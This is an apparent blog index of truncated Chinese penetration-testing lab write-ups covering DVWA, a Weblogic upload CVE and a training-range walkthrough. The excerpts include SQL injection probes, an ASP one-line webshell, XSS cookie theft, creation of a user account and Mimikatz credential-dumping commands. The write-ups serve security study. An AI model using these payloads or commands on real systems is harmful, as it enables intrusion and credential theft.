渗透学习
向那风
这个作者很懒,什么都没留下…
展开
-
渗透测试学习1---DVWA之XSS
反射型XSS1.lowPHP源码:<?php// Is there any input?if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user $html .= '<pre>Hello ' . $_GET[ 'name'...原创 2019-04-26 19:44:18 · 324 阅读 · 0 评论 -
封神台----尤里的复仇I-第七章:GET THE PASS!
继续上一章的远程桌面连接,在C盘下找到这两个文件。但是无权限打开。右键属性-安全。进行权限设置。压缩包需要密码,文本里提示使用minikatz工具,得到密码命令:privilege::debuug ----提升权限sekurlsa::logonPasswords----获取登陆用户密码...原创 2019-07-19 15:35:33 · 1211 阅读 · 1 评论 -
封神台----尤里的复仇I-第六章:SYSTEM!POWER!
通过上一章,上传的shell,使用菜刀连接右键点击输入命令 whoami权限不足,这里需要用到提权工具,工具在就不用再上传了。右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。尝试创建用户命令: net user 110 110 /add还是权限不足。这是因为cmd需要用到外部接口wscript.shell。但是wscript.shell仍然...原创 2019-07-19 14:12:14 · 1471 阅读 · 5 评论 -
复现(一)---Weblogic 任意文件上传漏洞(CVE-2018-2894)
在进行漏洞复现之前,登录后台,修改base_domain配置,在高级中启动“ 启用 Web 服务测试页”。Weblogic Web 服务测试客户端,其配置页面存在未授权访问的问题,路径为/ws_utc/config.do、/ws_utc/begin.do**复现过程:**config.do访问 config.do在这里插入代码片,更改Work Home工作目录。默认上传目录不...原创 2019-07-16 16:24:53 · 360 阅读 · 0 评论 -
封神台----尤里的复仇I-第五章:进击!拿到Web最高权限!
1.使用cookie进入后台根据提示信息需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****},点击之前,打开Burp,进行抓包,替换cookie放行,进入后台页面。2.找上传点在产品管理-添加产品中可以上传图片。上传带asp一句话的图片,asp一句话:<%eval request (“hacker”)%>木马一般会被拦截...原创 2019-07-18 17:17:07 · 1897 阅读 · 2 评论 -
封神台----尤里的复仇I-第四章:为了更多的权限!留言板!!
本章主要是xss平台使用,很简单。自己搭建xss平台或者网上随便找个平台注册使用。新建个项目,建好后,将下面代码复制到留言板里。提交,即可。去XSS平台接收消息。提交,完成。...原创 2019-07-18 15:47:00 · 1086 阅读 · 0 评论 -
封神台----尤里的复仇I-第三章:这个后台能识别登录者…
根据提示,真正的后台地址为admin123,输入上一关的账号、密码进去。分析代码:从请求头中拿到Referer,并赋值给ComeUrl。判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。最后判断cUrl和...原创 2019-07-18 15:20:31 · 1909 阅读 · 0 评论 -
封神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!
1.找注入点进去之后,查看新闻,一般在这里有注入点。输入?id=168 and 1=1过滤了一些关键字,通过测试没有过滤 == order by ==2.猜列数、报显示位通过测试,发现查询了10列?id=171 order by 10?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位3.查看数据库版本和当前数据库名?id=1...原创 2019-07-18 12:22:04 · 3432 阅读 · 6 评论 -
渗透测试学习2---DVWA之SQL Injection
1.lowPHP源码:<?phpif( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ...原创 2019-04-26 21:08:36 · 267 阅读 · 0 评论 -
封神台----尤里的复仇I-第一章:为了女神小芳
1.找注入点?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示2.猜列数、报显示位?id=1 order by 2 ------查询了两列?id=466454 select 1,2 ------将id设为一个不存在的数...原创 2019-07-17 22:18:07 · 3005 阅读 · 0 评论